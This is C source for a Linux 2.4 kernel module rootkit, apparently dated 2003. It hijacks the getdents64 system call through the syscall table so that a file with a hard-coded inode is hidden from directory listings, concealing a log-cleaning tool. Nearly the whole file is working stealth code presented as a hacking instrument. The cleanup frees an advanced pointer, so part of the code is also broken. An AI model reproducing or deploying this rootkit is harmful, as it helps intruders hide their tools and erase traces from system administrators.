/*
 *  hideproc.c - loggy tar.gz archive instrument, addin 
 *  that hide perfectly and stealthy the loggy cleaning process
 *  by hacking the local getdents64 syscall for 2.4.x kernels
 *  so 'ls' 'ps' 
 *  recoded for two reason the first lkm was too lame and
 *  too easy to detect..
 *  for bug reporting, mail me at this email address: evil@mojodo.it
 *
 *  THIS INSTRUMENT HAS BEEN CODED FOR EDUCATIONAL PURPOSES ONLY
 *  coded by Evil from MOJODO 2003 PROJECT
 *  IM NOT RESPONSIBLE OF YOUR ACT, DONT ABUSE IT www.mojodo.it (C)
 *
 */

#define MODULE
#define __KERNEL__
#define INODE 124557

#include <linux/module.h>
#include <asm/segment.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/fcntl.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>
#include <linux/ctype.h>

struct linux_dirent64 {
        u64             d_ino;
        s64             d_off;
        unsigned short  d_reclen;
        unsigned char   d_type;
        char            d_name[0];
};

extern void *sys_call_table[];

int (*orig_getdents64) (uint, void *, uint);

int hacked_getdents64(unsigned int fd, struct linux_dirent64 * dirp, unsigned int count)
{
   int orgc;
   int newc;
   int recc;
   struct linux_dirent64 *clone;
   struct linux_dirent64 *save;
   struct files_struct * files;

   if( (orgc = orig_getdents64(fd, dirp, count)) == -1 )
      return orgc;

   save = clone = (struct linux_dirent64 *) kmalloc(orgc, GFP_KERNEL);
   copy_from_user( clone, dirp, orgc );
   newc = orgc;
   while( newc > 0 )
   {
      recc = clone->d_reclen;
      newc -= recc;
      if( clone->d_ino == INODE )
      {
         if (newc != 0)
            memmove(clone, (char *) clone + clone->d_reclen, newc);
         else
            clone->d_off = 1024;
         orgc -= recc;
      }
      if( clone->d_reclen == 0 )
      {
         orgc -= newc;
         newc = 0; 
      }
      if (newc != 0)
         clone = (struct linux_dirent64 *) ((char *) clone + clone->d_reclen); // go to next entry
   }
   __copy_to_user( dirp, save, orgc );
   kfree( clone );
   return orgc;
}

int init_module(void)
{
   orig_getdents64 = sys_call_table[SYS_getdents64];
   sys_call_table[SYS_getdents64] = hacked_getdents64;
   return 0;
}

void cleanup_module(void)
{
   sys_call_table[SYS_getdents64]=orig_getdents64;
}
